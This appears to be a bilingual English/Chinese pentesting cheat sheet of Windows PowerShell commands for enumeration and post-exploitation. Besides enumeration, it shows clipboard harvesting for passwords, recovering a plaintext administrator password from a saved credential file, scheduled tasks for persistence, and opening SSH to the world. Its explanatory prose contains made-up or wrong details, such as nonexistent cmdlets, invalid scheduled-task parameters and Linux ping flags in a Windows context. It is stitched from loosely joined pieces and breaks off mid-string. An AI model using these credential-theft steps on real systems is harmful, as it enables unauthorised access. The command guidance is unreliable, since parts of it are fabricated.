Creating and Managing Groups

创建和管理组

In addition to the built-in groups, you can also create your own custom groups to manage access to specific resources or perform certain tasks.

除了内置组外，您还可以创建自己的自定义组，以管理对特定资源的访问或执行某些任务。

To create a new group, you can use the PowerShell New-LocalGroup cmdlet. For example, to create a group named "Developers", you can run the following command:

要创建一个新组，您可以使用PowerShell的New-LocalGroup命令。例如，要创建一个名为“Developers”的组，可以运行以下命令：

New-LocalGroup -Name "Developers"

Once the group is created, you can add users to it using the Add-LocalGroupMember cmdlet. For example, to add a user named "John" to the "Developers" group, you can run the following command:

创建组后，您可以使用Add-LocalGroupMember命令将用户添加到组中。例如，要将名为“John”的用户添加到“Developers”组中，可以运行以下命令：

Add-LocalGroupMember -Group "Developers" -Member "John"

You can also manage group membership using the Get-LocalGroupMember, Remove-LocalGroupMember, and Set-LocalGroup cmdlets.

您还可以使用Get-LocalGroupMember、Remove-LocalGroupMember和Set-LocalGroup命令管理组成员资格。

Group Policy

组策略

Group Policy is a feature in Windows that allows you to manage and control the settings of multiple computers in a network. It can be used to enforce security policies, configure system settings, and deploy software.

组策略是Windows中的一项功能，允许您管理和控制网络中多台计算机的设置。它可以用于强制执行安全策略、配置系统设置和部署软件。

Group Policy settings are stored in Group Policy Objects (GPOs), which can be linked to sites, domains, or organizational units (OUs) in Active Directory.

组策略设置存储在组策略对象（GPO）中，可以将其链接到Active Directory中的站点、域或组织单位（OU）。

To manage Group Policy settings, you can use the Set-GPRegistryValue, Set-GPRegistryPolicy, and Set-GPPermission cmdlets in PowerShell.

要管理组策略设置，可以使用PowerShell中的Set-GPRegistryValue、Set-GPRegistryPolicy和Set-GPPermission命令。

For example, to set a registry value in a Group Policy Object, you can run the following command:

例如，要在组策略对象中设置注册表值，可以运行以下命令：

Set-GPRegistryValue -Name "GPO1" -Key "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "DisableTaskMgr" -Type DWORD -Value 1

This command sets the registry value "DisableTaskMgr" to 1 in the specified Group Policy Object.

此命令将指定的组策略对象中的注册表值“DisableTaskMgr”设置为1。

Note that managing Group Policy requires administrative privileges on the domain controller or the computer where the Group Policy Management feature is installed.

请注意，管理组策略需要在域控制器或安装了组策略管理功能的计算机上具有管理员特权。

Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators

剪贴板

The clipboard is a temporary storage area in the computer's memory that allows you to copy and paste text, images, and other data between different applications or within the same application. It is a useful feature that makes it easy to transfer information without having to retype or reformat it.

In the context of pentesting, the clipboard can be a valuable source of information. When users copy sensitive data, such as passwords or credit card numbers, it is temporarily stored in the clipboard. As a pentester, you can leverage this to your advantage by monitoring the clipboard for any valuable information that may have been copied.

There are various ways to access the clipboard using PowerShell. The Get-Clipboard cmdlet allows you to retrieve the contents of the clipboard, while the Set-Clipboard cmdlet allows you to set the contents of the clipboard. You can also use the Add-ClipboardText cmdlet to add text to the clipboard without replacing the existing contents.

Here are some examples of how you can use PowerShell to interact with the clipboard:

• Retrieve the contents of the clipboard:

$clipboardContents = Get-Clipboard

• Set the contents of the clipboard:

Set-Clipboard -Value "Hello, world!"

• Add text to the clipboard without replacing the existing contents:

Add-ClipboardText -Text "Additional text"

By utilizing PowerShell's clipboard functionality, you can easily manipulate and extract information from the clipboard during a pentesting engagement. This can be particularly useful when conducting reconnaissance or gathering sensitive data. However, it is important to note that accessing someone's clipboard without their knowledge or consent may be illegal and unethical. Always ensure that you have proper authorization and follow ethical guidelines when performing any pentesting activities.

Get-Clipboard

进程

Processes are running instances of programs on a computer. They can be thought of as the execution of a program in memory. Each process has its own memory space and resources, and they can communicate with each other through various mechanisms.

进程是计算机上运行的程序实例。可以将其视为内存中程序的执行。每个进程都有自己的内存空间和资源，并且它们可以通过各种机制进行通信。

Viewing Processes

查看进程

To view the processes running on a Windows system, you can use the Get-Process cmdlet in PowerShell. This cmdlet retrieves information about the processes running on the local or remote computer.

要查看在Windows系统上运行的进程，可以使用PowerShell中的Get-Process命令。该命令检索有关本地或远程计算机上运行的进程的信息。

Get-Process

This command will display a list of processes running on the system, including their names, process IDs (PIDs), and memory usage.

此命令将显示系统上运行的进程列表，包括它们的名称、进程ID（PID）和内存使用情况。

Killing Processes

终止进程

To terminate a process in PowerShell, you can use the Stop-Process cmdlet. This cmdlet allows you to stop one or more processes based on their process IDs or names.

要在PowerShell中终止进程，可以使用Stop-Process命令。该命令允许您根据进程ID或名称停止一个或多个进程。

Stop-Process -Name "process_name"

Replace "process_name" with the name of the process you want to terminate.

将"process_name"替换为要终止的进程的名称。

Starting Processes

启动进程

You can use the Start-Process cmdlet in PowerShell to start a new process. This cmdlet allows you to specify the path to the executable file and any arguments or parameters required by the program.

您可以使用PowerShell中的Start-Process命令来启动新进程。该命令允许您指定可执行文件的路径以及程序所需的任何参数或参数。

Start-Process -FilePath "path_to_executable"

Replace "path_to_executable" with the path to the executable file you want to start.

将"path_to_executable"替换为要启动的可执行文件的路径。

Conclusion

结论

Understanding processes and how to view, terminate, and start them is essential for any pentester. PowerShell provides powerful cmdlets like Get-Process, Stop-Process, and Start-Process to manage processes effectively.

Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

服务

Introduction

介绍

In this section, we will cover some basic PowerShell commands that can be useful for pentesters when performing reconnaissance and enumeration on Windows systems. PowerShell is a powerful scripting language and automation framework that is built into Windows. It provides a command-line interface for interacting with the Windows operating system and can be used to perform a wide range of tasks, including system administration, network analysis, and security testing.

在本节中，我们将介绍一些基本的PowerShell命令，这些命令对于渗透测试人员在对Windows系统进行侦察和枚举时非常有用。PowerShell是一种强大的脚本语言和自动化框架，它内置于Windows中。它提供了一个命令行界面，用于与Windows操作系统进行交互，并可用于执行各种任务，包括系统管理、网络分析和安全测试。

Basic PowerShell Commands

基本的PowerShell命令

Get-Service

Get-Service

The Get-Service command is used to retrieve information about services running on a Windows system. It can be used to list all services, filter services based on specific criteria, and retrieve detailed information about a particular service.

Get-Service命令用于检索运行在Windows系统上的服务的信息。它可以用于列出所有服务，根据特定条件过滤服务，并检索有关特定服务的详细信息。

To list all services, simply run the following command:

要列出所有服务，只需运行以下命令：

Get-Service

This will display a list of all services running on the system, including their names, display names, and status.

这将显示系统上运行的所有服务的列表，包括它们的名称、显示名称和状态。

To filter services based on specific criteria, you can use the -Name parameter followed by a wildcard pattern. For example, to list all services starting with "SQL", you can run the following command:

要根据特定条件过滤服务，可以使用-Name参数后跟通配符模式。例如，要列出所有以"SQL"开头的服务，可以运行以下命令：

Get-Service -Name SQL*

This will display a list of services whose names start with "SQL".

这将显示以"SQL"开头的服务的列表。

To retrieve detailed information about a particular service, you can use the -Name parameter followed by the name of the service. For example, to retrieve information about the "Spooler" service, you can run the following command:

要检索有关特定服务的详细信息，可以使用-Name参数后跟服务的名称。例如，要检索有关"Spooler"服务的信息，可以运行以下命令：

Get-Service -Name Spooler

This will display detailed information about the "Spooler" service, including its status, startup type, and process ID.

这将显示有关"Spooler"服务的详细信息，包括其状态、启动类型和进程ID。

Start-Service

Start-Service

The Start-Service command is used to start a stopped service on a Windows system. It can be used to start a single service or multiple services at once.

Start-Service命令用于启动Windows系统上的已停止的服务。它可以用于启动单个服务或同时启动多个服务。

To start a single service, you can use the -Name parameter followed by the name of the service. For example, to start the "Spooler" service, you can run the following command:

要启动单个服务，可以使用-Name参数后跟服务的名称。例如，要启动"Spooler"服务，可以运行以下命令：

Start-Service -Name Spooler

This will start the "Spooler" service if it is currently stopped.

如果"Spooler"服务当前已停止，这将启动它。

To start multiple services at once, you can provide a comma-separated list of service names to the -Name parameter. For example, to start both the "Spooler" and "BITS" services, you can run the following command:

要同时启动多个服务，可以将服务名称以逗号分隔的形式提供给-Name参数。例如，要同时启动"Spooler"和"BITS"服务，可以运行以下命令：

Start-Service -Name Spooler,BITS

This will start both the "Spooler" and "BITS" services if they are currently stopped.

如果"Spooler"和"BITS"服务当前已停止，这将同时启动它们。

Stop-Service

Stop-Service

The Stop-Service command is used to stop a running service on a Windows system. It can be used to stop a single service or multiple services at once.

Stop-Service命令用于停止Windows系统上正在运行的服务。它可以用于停止单个服务或同时停止多个服务。

To stop a single service, you can use the -Name parameter followed by the name of the service. For example, to stop the "Spooler" service, you can run the following command:

要停止单个服务，可以使用-Name参数后跟服务的名称。例如，要停止"Spooler"服务，可以运行以下命令：

Stop-Service -Name Spooler

This will stop the "Spooler" service if it is currently running.

如果"Spooler"服务当前正在运行，这将停止它。

To stop multiple services at once, you can provide a comma-separated list of service names to the -Name parameter. For example, to stop both the "Spooler" and "BITS" services, you can run the following command:

要同时停止多个服务，可以将服务名称以逗号分隔的形式提供给-Name参数。例如，要同时停止"Spooler"和"BITS"服务，可以运行以下命令：

Stop-Service -Name Spooler,BITS

This will stop both the "Spooler" and "BITS" services if they are currently running.

如果"Spooler"和"BITS"服务当前正在运行，这将同时停止它们。

Conclusion

结论

PowerShell provides a powerful set of commands for interacting with services on a Windows system. The Get-Service, Start-Service, and Stop-Service commands can be used to retrieve information about services, start stopped services, and stop running services, respectively. These commands can be useful for pentesters during the reconnaissance and enumeration phases of a penetration test.

PowerShell提供了一组强大的命令，用于与Windows系统上的服务进行交互。Get-Service、Start-Service和Stop-Service命令分别用于检索有关服务的信息、启动已停止的服务和停止正在运行的服务。这些命令对于渗透测试人员在渗透测试的侦察和枚举阶段非常有用。

Get-Service

从安全字符串中获取密码

在进行渗透测试时，我们经常需要处理密码。在Windows环境中，密码通常以安全字符串的形式存储，这是一种加密的方式，可以保护密码的机密性。然而，对于渗透测试人员来说，我们需要将安全字符串转换为可读的密码，以便在测试过程中使用。

PowerShell提供了一种从安全字符串中获取密码的方法。以下是一个示例脚本，演示了如何使用PowerShell从安全字符串中提取密码：

$secureString = ConvertTo-SecureString -String "MySecurePassword" -AsPlainText -Force
$plainTextPassword = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
Write-Output $plainTextPassword

在上面的示例中，我们首先使用ConvertTo-SecureString命令将明文密码转换为安全字符串。然后，我们使用[Runtime.InteropServices.Marshal]::SecureStringToBSTR方法将安全字符串转换为BSTR（基于COM的字符串）表示。最后，我们使用[Runtime.InteropServices.Marshal]::PtrToStringAuto方法将BSTR转换为可读的密码，并将其输出到控制台。

通过运行上述脚本，您将能够从安全字符串中提取密码并将其显示出来。这对于渗透测试人员来说是非常有用的，因为它允许我们在测试过程中使用明文密码。

请注意，从安全字符串中提取密码可能会导致密码泄露的风险。因此，在使用此技术时，请确保采取适当的安全措施，并仅在受信任的环境中使用。

$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password

计划任务

Scheduled tasks are a powerful feature in Windows that allow you to automate the execution of scripts or programs at specific times or intervals. As a pentester, understanding how to leverage scheduled tasks can be beneficial for persistence, privilege escalation, and lateral movement.

计划任务是Windows中的一个强大功能，它允许您在特定时间或间隔内自动执行脚本或程序。作为一名渗透测试人员，了解如何利用计划任务可以对持久性、权限提升和横向移动产生积极影响。

Viewing Scheduled Tasks

查看计划任务

To view the existing scheduled tasks on a Windows system, you can use the Get-ScheduledTask cmdlet in PowerShell. This cmdlet retrieves a list of all scheduled tasks along with their properties.

要查看Windows系统上现有的计划任务，您可以使用PowerShell中的Get-ScheduledTask命令。该命令检索所有计划任务及其属性的列表。

Get-ScheduledTask

Creating Scheduled Tasks

创建计划任务

To create a new scheduled task, you can use the New-ScheduledTask cmdlet in PowerShell. This cmdlet allows you to specify the script or program to be executed, the trigger that defines when the task should run, and other settings such as the user account under which the task should run.

要创建一个新的计划任务，您可以使用PowerShell中的New-ScheduledTask命令。该命令允许您指定要执行的脚本或程序、定义任务何时运行的触发器以及其他设置，如任务应在哪个用户帐户下运行。

New-ScheduledTask -Action (New-ScheduledTaskAction -Execute "C:\path\to\script.ps1") -Trigger (New-ScheduledTaskTrigger -Daily -At 3am) -User "DOMAIN\username" -Password "password"

Modifying Scheduled Tasks

修改计划任务

To modify an existing scheduled task, you can use the Set-ScheduledTask cmdlet in PowerShell. This cmdlet allows you to change various properties of the task, such as the script or program to be executed, the trigger, and the user account.

要修改现有的计划任务，您可以使用PowerShell中的Set-ScheduledTask命令。该命令允许您更改任务的各种属性，如要执行的脚本或程序、触发器和用户帐户。

Set-ScheduledTask -TaskPath "\Folder" -TaskName "TaskName" -Action (New-ScheduledTaskAction -Execute "C:\path\to\newscript.ps1") -Trigger (New-ScheduledTaskTrigger -Daily -At 4am) -User "DOMAIN\username" -Password "password"

Deleting Scheduled Tasks

删除计划任务

To delete a scheduled task, you can use the Unregister-ScheduledTask cmdlet in PowerShell. This cmdlet removes the specified task from the system.

要删除计划任务，您可以使用PowerShell中的Unregister-ScheduledTask命令。该命令从系统中删除指定的任务。

Unregister-ScheduledTask -TaskPath "\Folder" -TaskName "TaskName"

Conclusion

结论

Scheduled tasks are a useful feature in Windows that can be leveraged by pentesters for various purposes. By understanding how to view, create, modify, and delete scheduled tasks using PowerShell, you can enhance your capabilities as a pentester and effectively navigate Windows systems.

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

网络

接口

PowerShell命令

Get-NetAdapter

此命令用于获取系统上的所有网络适配器的详细信息。

示例输出

Name                      InterfaceDescription                    ifIndex Status       MacAddress             LinkSpeed
----                      --------------------                    ------- ------       ----------             ---------
Ethernet                  Intel(R) Ethernet Connection (2) I219-V      12 Up           00-11-22-33-44-55       1 Gbps
Wi-Fi                     Intel(R) Dual Band Wireless-AC 8265          13 Up           66-77-88-99-AA-BB       300 Mbps

解释

• Name：适配器的名称。
• InterfaceDescription：适配器的描述。
• ifIndex：适配器的索引号。
• Status：适配器的状态。
• MacAddress：适配器的物理地址。
• LinkSpeed：适配器的链接速度。

PowerShell命令

Get-NetIPAddress

此命令用于获取系统上的所有IP地址的详细信息。

示例输出

IPAddress         : 192.168.1.100
InterfaceIndex    : 12
InterfaceAlias    : Ethernet
AddressFamily     : IPv4
Type              : Unicast
PrefixLength      : 24
PrefixOrigin      : Manual
SuffixOrigin      : Manual
AddressState      : Preferred
ValidLifetime     : Infinite ([TimeSpan]::MaxValue)
PreferredLifetime : Infinite ([TimeSpan]::MaxValue)
SkipAsSource      : False
PolicyStore       : ActiveStore

解释

• IPAddress：IP地址。
• InterfaceIndex：适配器的索引号。
• InterfaceAlias：适配器的别名。
• AddressFamily：地址类型。
• Type：地址类型。
• PrefixLength：前缀长度。
• PrefixOrigin：前缀来源。
• SuffixOrigin：后缀来源。
• AddressState：地址状态。
• ValidLifetime：有效期限。
• PreferredLifetime：首选期限。
• SkipAsSource：是否跳过作为源。
• PolicyStore：策略存储。

PowerShell命令

Get-NetRoute

此命令用于获取系统上的所有路由表项的详细信息。

示例输出

ifIndex DestinationPrefix    NextHop     RouteMetric ifMetric PolicyStore
------- -----------------    -------     ----------- -------- -----------
12      0.0.0.0/0            192.168.1.1 0           25       ActiveStore

解释

• ifIndex：适配器的索引号。
• DestinationPrefix：目标前缀。
• NextHop：下一跳。
• RouteMetric：路由度量。
• ifMetric：适配器度量。
• PolicyStore：策略存储。

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

防火墙

A firewall is a network security device that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Firewalls can be implemented as hardware devices or as software running on a computer.

防火墙是一种网络安全设备，根据预先确定的安全规则监控和控制进出网络的流量。它作为一个屏障存在于可信任的内部网络和不可信任的外部网络（如互联网）之间。防火墙可以作为硬件设备实现，也可以作为运行在计算机上的软件实现。

Firewalls use various techniques to filter network traffic, such as packet filtering, stateful inspection, and application-level gateways. They can block or allow traffic based on factors such as source and destination IP addresses, port numbers, and protocols.

防火墙使用各种技术来过滤网络流量，如数据包过滤、状态检查和应用层网关。它们可以根据源和目标IP地址、端口号和协议等因素来阻止或允许流量通过。

Firewalls are an essential component of network security and are commonly used to protect against unauthorized access, malware, and other cyber threats. They can be configured to provide different levels of security based on the specific needs of an organization.

防火墙是网络安全的重要组成部分，通常用于防止未经授权的访问、恶意软件和其他网络威胁。可以根据组织的具体需求配置不同级别的安全性。

Get-NetFirewallRule -Enabled True

Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow

# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow

# Get name, proto, local and rremote ports, remote address, penable,profile and direction
## You can user the following line changing the initial filters to indicat a difefrent direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property  DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action

路由

A route is a path that network traffic takes from one network to another. In the context of penetration testing, understanding and manipulating routes can be crucial for gaining access to target systems.

路由是网络流量从一个网络到另一个网络的路径。在渗透测试的背景下，理解和操纵路由对于获取目标系统的访问权限至关重要。

Route Enumeration

Route enumeration is the process of identifying and gathering information about the routes that exist on a target system. This information can be used to identify potential paths for further exploitation.

路由枚举是识别和收集目标系统上存在的路由信息的过程。这些信息可以用于识别进一步利用的潜在路径。

Route Manipulation

Route manipulation involves modifying the existing routes on a target system to redirect network traffic or gain unauthorized access. This can be done by adding, modifying, or deleting routes.

路由操纵涉及修改目标系统上的现有路由，以重定向网络流量或获取未经授权的访问权限。可以通过添加、修改或删除路由来实现。

Route Redirection

Route redirection is a technique used to redirect network traffic from its intended destination to a different location. This can be achieved by modifying the routing table on a target system.

路由重定向是一种将网络流量从其预期目的地重定向到其他位置的技术。可以通过修改目标系统上的路由表来实现这一点。

Route Poisoning

Route poisoning is a method of manipulating routing tables to misdirect network traffic. By injecting false or malicious routes, an attacker can redirect traffic to a compromised system under their control.

路由毒化是一种通过操纵路由表来误导网络流量的方法。通过注入虚假或恶意路由，攻击者可以将流量重定向到他们控制的受损系统。

Route Tracing

Route tracing, also known as traceroute, is a technique used to determine the path that network traffic takes from a source to a destination. This can be useful for identifying potential bottlenecks or vulnerabilities in the network.

路由跟踪，也称为traceroute，是一种用于确定网络流量从源到目的地的路径的技术。这对于识别网络中的潜在瓶颈或漏洞非常有用。

route print

ARP

ARP（地址解析协议）是一种用于将IP地址映射到物理MAC地址的协议。在局域网中，ARP被用于确定目标设备的MAC地址，以便在数据包传输过程中正确地将数据包发送到目标设备。

ARP欺骗是一种利用ARP协议的漏洞来欺骗网络设备的攻击技术。攻击者可以发送虚假的ARP响应，将目标设备的IP地址映射到攻击者的MAC地址上。这样，攻击者就可以拦截、修改或重定向目标设备的网络流量。

在进行ARP欺骗时，攻击者通常会使用工具如Ettercap、ARPspoof或Bettercap来发送虚假的ARP响应。这些工具允许攻击者欺骗目标设备，使其相信攻击者的MAC地址是正确的。

为了防止ARP欺骗攻击，可以采取一些基本的防御措施，如使用静态ARP表、启用ARP检测和防御工具、使用网络隔离和安全认证等。这些措施可以帮助保护网络免受ARP欺骗攻击的影响。

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

主机

The hosts file is a plain text file used by operating systems to map hostnames to IP addresses. It is commonly used to block or redirect certain websites or to override DNS settings. As a pentester, you can leverage the hosts file to redirect traffic to your own IP address or to bypass DNS resolution.

主机文件

hosts文件是操作系统使用的纯文本文件，用于将主机名映射到IP地址。它通常用于阻止或重定向特定的网站，或者用于覆盖DNS设置。作为渗透测试人员，您可以利用hosts文件将流量重定向到自己的IP地址，或者绕过DNS解析。

Get-Content C:\WINDOWS\System32\drivers\etc\hosts

Ping

Ping是一种常用的网络工具，用于测试主机之间的连通性。它通过向目标主机发送ICMP回显请求并等待回复来确定主机是否可达。Ping命令通常用于诊断网络问题和测量网络延迟。

使用Ping命令可以执行以下操作：

• 检查目标主机是否在线
• 测试网络连接的稳定性
• 测量网络延迟
• 确定网络中的丢包率

Ping命令的基本语法如下：

ping <目标主机>

其中，<目标主机>是要测试连通性的主机的IP地址或域名。

Ping命令会发送一系列ICMP回显请求到目标主机，并显示每个请求的往返时间（RTT）以及丢包情况。通过观察Ping命令的输出，可以判断目标主机的连通性和网络质量。

Ping命令还支持一些可选参数，例如：

• -c <次数>：指定发送ICMP请求的次数。
• -i <间隔>：指定发送ICMP请求的间隔时间。
• -s <大小>：指定ICMP请求的数据包大小。

使用Ping命令时，需要注意以下几点：

• Ping命令需要在命令行界面（如Windows的命令提示符或Linux的终端）中执行。
• 需要具有足够的网络权限才能执行Ping命令。
• Ping命令的结果可能受到防火墙或网络设备的影响，因此结果可能不准确。

Ping命令是网络诊断和测试中常用的工具之一，对于网络管理员和安全专业人员来说非常有用。

$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }

SNMP

SNMP（Simple Network Management Protocol）是一种用于管理和监控网络设备的协议。它允许管理员通过发送和接收消息来获取有关设备的信息，例如系统状态、网络流量和错误日志。SNMP使用基于UDP的传输协议，并使用MIB（Management Information Base）来定义设备上可用的信息。

SNMP的工作原理

SNMP的工作原理基于客户端-服务器模型。管理员使用SNMP管理工具作为客户端，向设备发送请求以获取信息。设备上运行的SNMP代理作为服务器，接收并响应这些请求。SNMP消息由管理工具和代理之间通过网络传输。

SNMP的版本

SNMP有三个主要版本：SNMPv1、SNMPv2c和SNMPv3。

• SNMPv1是最早的版本，具有较低的安全性和功能。它使用明文传输，并使用固定的社区字符串作为身份验证凭据。
• SNMPv2c是SNMPv2的一个简化版本，增加了一些功能，但仍然使用明文传输和固定的社区字符串进行身份验证。
• SNMPv3是最新的版本，提供了更强的安全性和功能。它支持加密和身份验证协议，并允许管理员对消息进行加密和身份验证。

SNMP的攻击技术

由于SNMP的早期版本存在安全漏洞，因此它成为黑客的攻击目标。以下是一些常见的SNMP攻击技术：

• 社区字符串猜测：黑客尝试猜测设备上使用的SNMP社区字符串，以获取对设备的访问权限。
• SNMP漏洞利用：黑客利用已知的SNMP漏洞来获取未经授权的访问权限或执行恶意操作。
• SNMP信息泄露：黑客使用SNMP协议获取设备上的敏感信息，例如系统配置、密码和网络拓扑。

保护SNMP

为了保护SNMP，管理员可以采取以下措施：

• 使用较新的SNMP版本，如SNMPv3，以提供更强的安全性和功能。
• 配置强密码和访问控制列表（ACL）来限制对SNMP服务的访问。
• 定期更新设备上的SNMP软件和固件，以修复已知的漏洞。
• 监控SNMP活动并记录日志，以便及时检测和响应潜在的攻击。

总结

SNMP是一种用于管理和监控网络设备的协议，但它也存在安全风险。管理员应该采取适当的措施来保护SNMP服务，以防止黑客利用其进行未经授权的访问和信息泄露。

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

将SDDL字符串转换为可读格式

To convert the SDDL (Security Descriptor Definition Language) string into a readable format, you can use the ConvertFrom-SddlString cmdlet in PowerShell. This cmdlet allows you to parse and interpret the SDDL string, providing a more human-readable output.

$sddlString = "D:(A;;GA;;;WD)(A;;GA;;;BA)"
$securityDescriptor = ConvertFrom-SddlString -Sddl $sddlString
$securityDescriptor

The ConvertFrom-SddlString cmdlet takes the SDDL string as input and returns a System.Security.AccessControl.CommonSecurityDescriptor object. This object contains the parsed information from the SDDL string, such as the access control entries (ACEs) and their corresponding permissions.

By running the above code, you will see the converted SDDL string in a readable format, which includes the access control entries and their permissions.

Note: It is important to understand the SDDL format and its components to effectively interpret the converted output.

PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-384293